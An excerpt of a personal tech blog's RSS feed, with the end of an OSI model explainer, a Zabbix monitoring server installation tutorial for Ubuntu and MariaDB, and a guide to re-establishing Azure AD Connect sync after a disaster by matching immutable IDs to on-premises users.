<h2 id="heading-data-link-layer"><strong>Data Link Layer</strong></h2>
<p>The data link layer is responsible for the transmission of data between devices on the same network. It breaks up packets into frames and sends them from source to destination.</p>
<p>This layer is composed of two parts:</p>
<ul>
<li><p>Logical Link Control (LLC), which identifies network protocols, performs error checking, and synchronizes frames,</p>
</li>
<li><p>Media Access Control (MAC) uses MAC addresses to connect devices and define permissions to transmit and receive data.</p>
</li>
</ul>
<h2 id="heading-physical-layer"><strong>Physical Layer</strong></h2>
<p>The physical layer is responsible for the physical or wireless connection between network nodes.</p>
<p>It defines the connector, the electrical cable, or wireless technology connecting the devices, and is responsible for the transmission of the raw data, which is simply a series of 0s and 1s while taking care of bit rate control.</p>
<h2 id="heading-advantages-of-the-osi-model"><strong>Advantages of the OSI model</strong></h2>
<p>The advantages of the OSI model are:</p>
<ul>
<li><p>It helps to standardize routers, switches, motherboards, and other hardware.</p>
</li>
<li><p>It is a generic model and acts as a guidance tool to develop any network model.</p>
</li>
<li><p>It helps users and operators of computer networks to determine the required hardware and software to build their network.</p>
</li>
<li><p>It helps users and operators of computer networks to understand and communicate the process followed by components communicating across a network.</p>
</li>
<li><p>It helps users and operators perform troubleshooting, by identifying which network layer is causing an issue and focusing efforts on that layer.</p>
</li>
</ul>
<h2 id="heading-osi-and-tcpip"><strong>OSI and TCP/IP</strong></h2>
<p>TCP/IP and OSI are two different models used for network communication. OSI follows an academic approach, whereas TCP/IP follows a practical approach.</p>
<p>The TCP/IP model is a functional model designed to solve specific communication problems, while OSI is a generic, protocol-independent model intended to describe all forms of network communication.</p>
<p>TCP/IP is a standard protocol used for every network including the Internet, while OSI is not a protocol but a reference model used for understanding and designing the system architecture.</p>
<p>A key difference between the models is that TCP/IP is simpler, collapsing several OSI layers into one:</p>
<ul>
<li><p>OSI layers 5, 6, and 7 are combined into one application layer in TCP/IP.</p>
</li>
<li><p>OSI layers 1, and 2 are combined into one network access layer in TCP/IP.</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691976577187/f6f7ff00-9006-4304-bd51-9f25cf0989fb.png" alt class="image--center mx-auto" /></p>
<p>Surprisingly, the TCP/IP model came into existence about 10 years before the OSI model. As it turned out, TCP/IP had too much momentum to be overtaken by the OSI model or any of the other competing network models.</p>
]]></content:encoded></item><item><title><![CDATA[Zabbix Monitoring Tool]]></title><description><![CDATA[What is Zabbix?
Zabbix is an open-source monitoring software tool that helps organizations track and monitor their IT infrastructure and networks in real-time. It is designed to provide comprehensive monitoring of networks, servers, applications, and...]]></description><link>https://chinhnd.org/zabbix-monitoring-tool</link><guid isPermaLink="true">https://chinhnd.org/zabbix-monitoring-tool</guid><category><![CDATA[automation]]></category><category><![CDATA[networking]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:19:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/qwtCeJ5cLYs/upload/38b9ee04b1e2d0d388f1bed28f096a64.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-zabbix"><strong>What is Zabbix?</strong></h1>
<p>Zabbix is an open-source monitoring software tool that helps organizations track and monitor their IT infrastructure and networks in real-time. It is designed to provide comprehensive monitoring of networks, servers, applications, and services, and to alert administrators when problems occur.</p>
<p>Zabbix can monitor various aspects of IT infrastructure such as CPU, memory, disk usage, network bandwidth, and more. It provides a centralized platform for monitoring and reporting, allowing administrators to view the status of all devices and services on their network from a single dashboard.</p>
<p>Zabbix offers a wide range of features, including data collection via SNMP, JMX, IPMI, and other protocols, real-time alerting, flexible reporting and analysis, and the ability to automate remediation actions. It also supports the visualization of data through charts, graphs, and maps.</p>
<h1 id="heading-zabbix-operation"><strong>Zabbix Operation</strong></h1>
<p>Zabbix collects information from Network Devices and Servers using two methods, agentless and agent installed.</p>
<h2 id="heading-agentless"><strong>Agentless</strong></h2>
<p>It allows administrators to monitor devices without the need to install an agent on each device.</p>
<p>Agentless monitoring in Zabbix works by using protocols such as ICMP, SNMP, and SSH to gather data from network devices and servers.</p>
<p>For example, ICMP can be used to check the availability of network devices, SSH can be used to execute commands on remote servers and retrieve data.</p>
<p>However, agentless monitoring may not be as comprehensive as agent-based monitoring, as it relies on standard protocols that may not provide access to all of the performance data available on a device.</p>
<p>Additionally, agentless monitoring may be less secure than agent-based monitoring, as it requires the use of credentials to access devices over the network.</p>
<h2 id="heading-zabbix-agent"><strong>Zabbix Agent</strong></h2>
<p>Agent installation: Zabbix requires an agent to be installed on each monitored device. This agent collects data on the device's performance and sends it to the Zabbix server for processing.</p>
<ul>
<li><p>Data collection: Zabbix can collect data from a variety of sources, including SNMP, JMX, IPMI, and other protocols. The collected data is stored in a database for analysis and reporting.</p>
</li>
<li><p>Threshold monitoring: Zabbix allows administrators to set thresholds for the collected data. When a value exceeds a threshold, Zabbix generates an alert, which can be sent to one or more designated recipients via email, SMS, or other channels.</p>
</li>
<li><p>Alerting: Zabbix can send alerts to multiple recipients based on user-defined rules. Administrators can define different levels of severity for different types of alerts and set up escalation policies to ensure timely responses to critical issues.</p>
</li>
<li><p>Reporting: Zabbix provides a range of reporting options, including real-time dashboards, scheduled reports, and ad-hoc queries. Reports can be customized to provide the specific information required by administrators.</p>
</li>
<li><p>Remediation: Zabbix also supports the ability to automate remediation actions, such as restarting a service or executing a script, based on user-defined rules.</p>
</li>
</ul>
<h2 id="heading-zabbix-structure"><strong>Zabbix Structure</strong></h2>
<p>The web front-end is what we normally open in our web browser and is used as a centralized visualization and configuration platform.</p>
<p>The Zabbix server is the brain of the entire system, which is responsible for gathering data from the hosts and proxies, analyzing it, and acting based on the triggers that we have created.</p>
<p>The database is where everything is stored, what we configure in our front end: items, hosts, proxies, triggers, actions, or whatever else. We collect those data from our hosts and store them in the database for the period we need.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691978701035/79771512-f5d7-4e56-b63f-cbe21013b8bf.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-zabbix-installation"><strong>Zabbix Installation</strong></h1>
<h2 id="heading-system-requirement"><strong>System Requirement</strong></h2>
<p>OS: Ubuntu 22.04 LTS (can be changed to lower or other distros)</p>
<p>Zabbix version: 6.0 LTS</p>
<p>Database version: MariaDB 10.6 (you can use PostgreSQL or MySQL)</p>
<p>Firewall setting: TCP 80 &amp; 443</p>
<h2 id="heading-zabbix-server-installation"><strong>Zabbix Server Installation</strong></h2>
<p>Download and install the repo for Zabbix's latest stable version 6.0 LTS.</p>
<pre><code class="lang-bash">wget https://repo.zabbix.com/zabbix/6.0/ubuntu/pool/main/z/zabbix-release/zabbix-release_6.0-4+ubuntu22.04_all.deb
sudo dpkg -i zabbix-release_6.0-4+ubuntu22.04_all.deb
sudo apt update
</code></pre>
<p>Install the necessary packages for the Zabbix server.</p>
<pre><code class="lang-bash">sudo apt install zabbix-server-mysql zabbix-frontend-php zabbix-apache-conf zabbix-sql-scripts zabbix-agent -y
</code></pre>
<h2 id="heading-database-installation"><strong>Database Installation</strong></h2>
<p>Download and install the repo for MariaDB.</p>
<pre><code class="lang-bash">curl -LsS -O https://downloads.mariadb.com/MariaDB/mariadb_repo_setup
sudo bash mariadb_repo_setup --mariadb-server-version=10.6
sudo apt update
</code></pre>
<p>Install the necessary packages and enable MariaDB.</p>
<pre><code class="lang-bash">sudo apt -y install mariadb-common mariadb-server-10.6 mariadb-client-10.6 -y
sudo systemctl start mariadb
sudo systemctl <span class="hljs-built_in">enable</span> mariadb
sudo mysql_secure_installation
</code></pre>
<p>Create an initial user for the database.</p>
<pre><code class="lang-bash">sudo mysql_secure_installation

Remove anonymous users? Yes
Disallow root login remotely? Yes
Remove <span class="hljs-built_in">test</span> database and access to it? Yes
</code></pre>
<p>Create a user and data table for Zabbix</p>
<pre><code class="lang-bash"><span class="hljs-comment">#Access SQL with user root</span>
sudo mysql -u root
mysql &gt; create database zabbix character <span class="hljs-built_in">set</span> utf8mb4 collate utf8mb4_bin;
mysql &gt; grant all privileges on zabbix.* to zabbix@localhost identified by <span class="hljs-string">'password'</span>;
mysql &gt; <span class="hljs-built_in">set</span> global log_bin_trust_function_creators = 1;
mysql &gt; flush privileges;
mysql &gt; quit

<span class="hljs-comment"># Set default SQL user</span>
sudo zcat /usr/share/zabbix-sql-scripts/mysql/server.sql.gz | mysql --default-character-set=utf8mb4 -uzabbix -p<span class="hljs-string">'password'</span> zabbix
</code></pre>
<h2 id="heading-set-up-zabbix"><strong>Set Up Zabbix</strong></h2>
<p>Change the Zabbix setting file.</p>
<pre><code class="lang-bash">sudo nano /etc/zabbix/zabbix_server.conf
<span class="hljs-comment">#edit below part which matches with your info.</span>
DBName=zabbix
DBUser=zabbix
DBPassword=password
</code></pre>
<p>Restart Zabbix services.</p>
<pre><code class="lang-bash">sudo systemctl restart zabbix-server zabbix-agent
sudo systemctl <span class="hljs-built_in">enable</span> zabbix-server zabbix-agent
</code></pre>
<p>You can now access the Zabbix web interface and complete the setup</p>
<p><a target="_blank" href="http://your-ip-add/zabbix">your-ip-add/zabbix</a></p>
<p>Input the database information that you create above, and complete the setup.</p>
]]></content:encoded></item><item><title><![CDATA[How to migrate Azure AD Connect from a Disaster Recovery]]></title><description><![CDATA[What is Azure AD Connect?
Simply put, Azure AD Connect is a solution to automatically synchronize identity data between their on-premises Active Directory environment and Azure AD. That way, users can use a single identity to access on-premises appli...]]></description><link>https://chinhnd.org/how-to-migrate-azure-ad-connect-from-a-disaster-recovery</link><guid isPermaLink="true">https://chinhnd.org/how-to-migrate-azure-ad-connect-from-a-disaster-recovery</guid><category><![CDATA[Cloud]]></category><category><![CDATA[networking]]></category><category><![CDATA[Disaster recovery]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:09:20 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/M5tzZtFCOfs/upload/1d13e6fca1a58c97bed7bb552d5c0509.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-azure-ad-connect"><em>What is Azure AD Connect?</em></h1>
<p>Simply put, Azure AD Connect is a solution to automatically synchronize identity data between their on-premises Active Directory environment and Azure AD. That way, users can use a single identity to access on-premises applications and cloud services such as Microsoft 365.</p>
<ul>
<li><p>It includes a number of technologies:</p>
</li>
<li><p>Azure AD Connect Sync</p>
</li>
<li><p>Azure AD Connect Health</p>
</li>
<li><p>ADFS (Active Directory Federation Services)</p>
</li>
<li><p>The PHS/PTA/SSSO Provisioning Connector</p>
</li>
</ul>
<p>Azure AD Connect supports integration with other Microsoft products such as Office365, Sharepoint, Dynamics CRM, and Outlook.</p>
<p>Alternatively, you can also consider the cloud-managed solution: Azure AD Connect cloud sync.</p>
<h1 id="heading-what-happens-if-you-lose-your-azure-ad-sync"><em>What happens if you lose your Azure AD sync?</em></h1>
<p>If you lose your Azure AD sync, it depends on the type of sync you are using.</p>
<p>If you sync password hashes, you can still connect to O365 without issue.</p>
<p>If you use Pass-through Authentication, you’re dead, no access to O365.</p>
<p>When the sync is interrupted, you will not be able to make changes to the on-premises Active Directory and those changes will not be synchronized to Azure AD until you restore connectivity.</p>
<h1 id="heading-how-to-migrate-existing-azure-ad-connect-after-a-network-disaster"><em>How to migrate existing Azure AD connect after a network disaster?</em></h1>
<h2 id="heading-create-the-same-ad-server"><em>Create the same AD server</em></h2>
<p>Firstly, make sure we have the same AD server with all the identities.</p>
<p>Create an AD with the same domain name. I have my local domain as "clayton.local"</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5ab60de705f2ae9d9a699a4b5da3863f8d33dfb1b8b31282922aedea80be9611.webp" alt /></p>
<p>Go to Tool &gt; Active Directory Domain and Trust.</p>
<p>Right-click the domain, choose Properties, and Add Alternative Suffixes.</p>
<p>I use my own: "<a target="_blank" href="http://susuomlu.com">susuomlu.com</a>". This will be our UPN.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5144b9592a454b9a4490ba31cbbe0ff7a629244b29bd37ff95b991f8352f63ee.webp" alt /></p>
<h2 id="heading-manually-create-users-with-the-same-sids"><em>Manually create users with the same SIDs</em></h2>
<p>Go to <a target="_blank" href="http://portal.azure.com">portal.azure.com</a> &gt; Azure Active Directory &gt; Users and select users that need to be synchronized.</p>
<p>Click on 'Properties' and you can see their "On-premises immutable ID" attribute's value.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/7db10c1717b193fafb36c71db80984d02ddce11f67408110e204129e5d34cc9f.webp" alt /></p>
<p>Or, we can get all IID using the script below:</p>
<pre><code class="lang-haskell"><span class="hljs-type">Install</span>-<span class="hljs-type">Module</span> <span class="hljs-type">MSOnline</span>
<span class="hljs-type">Import</span>-<span class="hljs-type">Module</span> <span class="hljs-type">MSOnline</span>
<span class="hljs-type">Connect</span>-<span class="hljs-type">MsolService</span>
$onlineusers = <span class="hljs-type">Get</span>-<span class="hljs-type">MsolUser</span> -<span class="hljs-type">All</span> | <span class="hljs-type">Select</span>-<span class="hljs-type">Object</span> <span class="hljs-type">UserprincipalName</span>,<span class="hljs-type">ImmutableID</span>,<span class="hljs-type">LastDirSyncTime</span>| <span class="hljs-type">Export</span>-<span class="hljs-type">Csv</span> c:\<span class="hljs-type">IID</span>.csv -<span class="hljs-type">NoTypeInformation</span>
</code></pre>
<p>Run the script to get all IID of users, this .csv file is stored at C:\IID.csv</p>
<h2 id="heading-create-the-unique-sid-from-immutable-id"><em>Create the unique SID from Immutable ID</em></h2>
<p>Run this PowerShell Script, and replace the list with the immutable ID from the .csv file.</p>
<pre><code class="lang-haskell">$<span class="hljs-type">IID_List</span> = @('dMIj64cN/<span class="hljs-number">0</span>CM9fmLIexC4g==','<span class="hljs-type">I4VwJomrjUWzPHk6sMlh3g</span>==','rT8wJf+<span class="hljs-type">DrkCcKVxXX7ADzA</span>==','vqhLzR9Mq0aEvHed8eA00Q==') ### <span class="hljs-type">You</span> can put more into this list
<span class="hljs-type">Function</span> <span class="hljs-type">Convert_IID_to_SID</span> ($<span class="hljs-type">IID</span>){
    $b64 = $<span class="hljs-type">IID</span>
    $bytes = [<span class="hljs-type">System</span>.<span class="hljs-type">Convert</span>]::<span class="hljs-type">FromBase64String</span>($b64)
    $hex = <span class="hljs-type">New</span>-<span class="hljs-type">Object</span> -<span class="hljs-type">TypeName</span> <span class="hljs-type">System</span>.<span class="hljs-type">Text</span>.<span class="hljs-type">StringBuilder</span> -<span class="hljs-type">ArgumentList</span> ($bytes.<span class="hljs-type">Length</span> * <span class="hljs-number">2</span>)
    foreach ($byte <span class="hljs-keyword">in</span> $bytes) {
    $hex.<span class="hljs-type">AppendFormat</span>(<span class="hljs-string">"{0:x2}"</span>, $byte) &gt; $null
    }
    $hex.<span class="hljs-type">ToString</span>().<span class="hljs-type">ToUpper</span>()
}
<span class="hljs-type">Foreach</span> ($item <span class="hljs-keyword">in</span> $<span class="hljs-type">IID_List</span>) {
    <span class="hljs-type">Convert_IID_to_SID</span>($item)
}
</code></pre>
<p>After the run, 32-Digit values should appear. Copy them for later use.</p>
<p>Please carefully check if the SID is correct for each user.</p>
<h2 id="heading-create-new-users-with-the-same-unique-immutable-id"><em>Create new users with the same unique Immutable ID</em></h2>
<p>Create users, using the UPN.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/97941b74ff5d6d5296604c61af7c1d2c9b06a2aa057858c21244f9707d84326f.webp" alt /></p>
<p>Go to View and Enable Advanced Features</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/06111f1d3d3e8ca573fd872856924642f7568128d63427edfad2d9e9d18acc79.webp" alt /></p>
<p>Right Click on the User, go to Properties &gt; Attribute Editor, and find the "ms-DS-ConsistencyGuid" attribute.</p>
<p>Select Edit/Modify for the attribute.</p>
<p>Paste the 32-Digit string from before.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/cc737de5a00d7a3c22f6266183acf43526bbdabdc99fcdf4c49696fdd8ff725f.webp" alt /></p>
<p>Apply and OK.</p>
<p>You will have to do this for all the users, otherwise, they will be duplicated.</p>
<p>Now, you can install Azure AD Connect and start the sync process again.</p>
<h1 id="heading-the-result"><em>The result</em></h1>
<p>This action will create a Service account.</p>
<p>If the SID was modified correctly, other user accounts will not be duplicated.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/5f21322bc64f6d4a38caabb30dd482799ee41a7ab87596e6adb14d840156a78c.webp" alt /></p>
<p>On Azure Portal, check if  Sync Status is Enabled and Last Synced recently.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/b7c33b44257994c9f8d399d38b0d4bd58ff764d4e7922e91da3a00382c94af65.webp" alt /></p>
<p>After this, you have successfully migrated your existing Azure AD connect!</p>
]]></content:encoded></item></channel></rss>